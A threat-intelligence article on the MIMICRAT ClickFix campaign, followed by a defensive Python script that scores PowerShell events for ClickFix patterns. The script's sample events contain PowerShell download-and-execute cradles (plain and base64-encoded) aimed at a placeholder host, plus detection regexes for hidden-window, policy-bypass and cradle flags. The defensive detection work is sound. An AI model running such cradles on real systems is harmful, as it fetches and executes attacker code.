MIMICRAT: Unveiling the Sophisticated Multi-Stage ClickFix Cyber Threat
A newly identified cyber campaign has emerged, employing a deceptive technique known as ClickFix to distribute a custom remote access trojan (RAT) named MIMICRAT. The operation compromises legitimate websites to use them as delivery vectors, and it bypasses traditional security controls by relying on social engineering rather than on software exploits. MIMICRAT, a versatile native C++ implant, is designed for long-term stealth and persistence, posing a significant risk to global enterprises.
Attack Sequence and Methodology
The attack begins when a user visits a trusted site, such as a financial tool, into which malicious JavaScript has been silently injected. This script presents a fraudulent Cloudflare verification pop-up, urging the victim to copy and execute a specific PowerShell command to resolve a supposed browser error. By exploiting user trust, this ClickFix tactic circumvents browser-based download protections: because the victim runs the command outside the browser, no file ever passes through the browser's download checks.
Elastic analysts identified this complex threat in early February 2026, observing its use of five distinct infection stages to successfully evade detection. The researchers highlighted that the campaign targets multiple industries by dynamically localizing lures into 17 different languages, ensuring broad reach across various geographies. They noted that the malware’s modular design allows attackers to adapt their tactics rapidly.
MIMICRAT Capabilities
The final payload, MIMICRAT, is equipped with advanced capabilities, including Windows token theft, file system manipulation, and SOCKS5 tunneling. It maintains persistence while communicating with command-and-control servers using malleable HTTP profiles that blend seamlessly with legitimate web analytics traffic. This sophisticated camouflage makes identification by network defenders exceptionally challenging, as the malicious signals are hidden amidst normal background noise.
Stealthy Infection and Execution
The infection mechanism is engineered to bypass modern defenses through a series of calculated, obfuscated steps. After the initial PowerShell execution, a heavily obfuscated second script is downloaded to disable Event Tracing for Windows (ETW) and the Antimalware Scan Interface (AMSI). This step blinds security tools that depend on those telemetry sources, allowing the subsequent stages to operate on the victim’s machine without generating standard alerts.
Following these bypasses, a Lua-based loader is dropped to decrypt and execute the final shellcode entirely within system memory. This fileless approach ensures that MIMICRAT resides only in RAM, significantly reducing its digital footprint and complicating forensic analysis for security teams attempting to trace the intrusion. The use of a custom Lua loader further obscures the attack flow.
Defensive Measures
To defend against this threat, organizations must enhance user training to recognize fake browser verification prompts and to avoid pasting unknown commands. Security teams should enforce strict PowerShell execution policies and monitor for obfuscated command lines. Blocking known malicious domains and inspecting network traffic for MIMICRAT’s specific communication patterns are also critical for disrupting the attack chain before data exfiltration occurs.
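The monitoring advice above can be turned into a concrete triage rule. The script below is an added example, not code from the article or from Elastic's research: it scores PowerShell process-creation events for the ClickFix pattern the article describes (a command pasted by the user, so the parent is the desktop shell, combined with a hidden window, an execution-policy override, an encoded command or a download-and-execute cradle). The field names `ParentImage`, `Image` and `CommandLine` follow the common Sysmon process-creation layout, the sample events and the `EXAMPLE-PLACEHOLDER.invalid` host are constructed for the example, and the indicator weights and threshold are assumptions to tune against your own telemetry.

```python
"""
Heuristic triage of PowerShell process-creation events for ClickFix-style
execution. Everything here is example code: the events are constructed,
the field names follow the usual Sysmon Event ID 1 layout (an assumption),
and the weights/threshold are starting points, not validated detections.
"""
import base64
import re
from typing import Dict, List

# Indicator weights: how much each observation contributes to the score
# (assumed values for this example).
WEIGHTS = {
    "parent_explorer": 3,   # launched from explorer.exe, e.g. via the Run dialog
    "hidden_window": 2,     # -w hidden / -WindowStyle Hidden
    "policy_bypass": 2,     # -ep bypass / -ExecutionPolicy Bypass
    "encoded_command": 3,   # -e / -ec / -enc / -EncodedCommand <base64>
    "download_cradle": 3,   # Invoke-Expression fed by a web download
    "noprofile": 1,         # -nop / -NoProfile
}

HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
POLICY_RE = re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I)
NOPROFILE_RE = re.compile(r"(?:^|\s)-nop(?:rofile)?\b", re.I)
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
DOWNLOAD_RE = re.compile(
    r"(?:downloadstring|downloaddata|invoke-webrequest|\biwr\b|"
    r"invoke-restmethod|\birm\b|net\.webclient|start-bitstransfer)", re.I)


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or "" if none/undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(event: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation event; returns score, matched indicators, decoded payload."""
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower()
    decoded = decode_encoded_command(cmd)
    # The cradle may be visible in the raw line or only inside the decoded payload.
    text = cmd + "\n" + decoded

    hits: List[str] = []
    if parent.endswith("\\explorer.exe"):
        hits.append("parent_explorer")
    if HIDDEN_RE.search(cmd):
        hits.append("hidden_window")
    if POLICY_RE.search(cmd):
        hits.append("policy_bypass")
    if ENCODED_RE.search(cmd):
        hits.append("encoded_command")
    if IEX_RE.search(text) and DOWNLOAD_RE.search(text):
        hits.append("download_cradle")
    if NOPROFILE_RE.search(cmd):
        hits.append("noprofile")

    return {"score": sum(WEIGHTS[h] for h in hits), "hits": hits, "decoded": decoded}


def triage(events: List[Dict[str, str]], threshold: int = 5) -> List[Dict[str, object]]:
    """Return the scored events at or above the threshold, tagged with their index."""
    flagged = []
    for i, ev in enumerate(events):
        result = score_event(ev)
        if result["score"] >= threshold:
            result["index"] = i
            flagged.append(result)
    return flagged


PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # ClickFix-style paste into the Run dialog: shell parent, hidden, policy override, cradle
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": PS_EXE,
        "CommandLine": 'powershell -w hidden -ep bypass -nop -c '
                       '"iex (iwr http://EXAMPLE-PLACEHOLDER.invalid/x)"',
    },
    {   # Same cradle, but hidden behind -EncodedCommand so the raw line shows no URL
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": PS_EXE,
        "CommandLine": "powershell -nop -w hidden -enc " + encode_ps(
            "iex (new-object net.webclient).downloadstring("
            "'http://EXAMPLE-PLACEHOLDER.invalid/x')"),
    },
    {   # Benign scheduled maintenance script: service-host parent, script file on disk
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": PS_EXE,
        "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\Backup-Logs.ps1",
    },
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"event {hit['index']}: score={hit['score']} hits={hit['hits']}")
        if hit["decoded"]:
            print("  decoded payload:", hit["decoded"])
```

Two design points matter for this campaign. First, the execution policy is not a security boundary: the pasted command overrides it inline, so an "enforced" policy stops nothing by itself, and it is the presence of the override on the command line that is worth alerting on. Second, because the second stage disables ETW and AMSI on the host, the process-creation event of the first stage (recorded before the bypass runs) and network-side inspection are the telemetry most likely to survive; the scorer therefore works from the command line and its decoded payload rather than from script-block logging.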